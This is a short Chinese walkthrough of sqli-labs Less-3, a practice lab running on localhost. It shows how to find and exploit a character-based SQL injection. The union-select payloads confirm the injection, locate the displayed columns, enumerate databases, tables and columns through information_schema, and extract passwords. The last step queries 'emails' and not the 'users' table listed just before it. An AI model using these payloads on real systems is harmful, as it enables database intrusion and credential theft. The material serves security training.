1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload：?id=1’) and 1=1--+

注：根据报错提示的语法错误，在第一行中使用接近’union select 1,2,3--’)的正确语法

3.判断注入点：2，3

Payload：id=-1’) union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload：id=-1’) union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload：

id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload：

id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名：password

Payload：

id=-1’) union select 1,password,3 from emails--+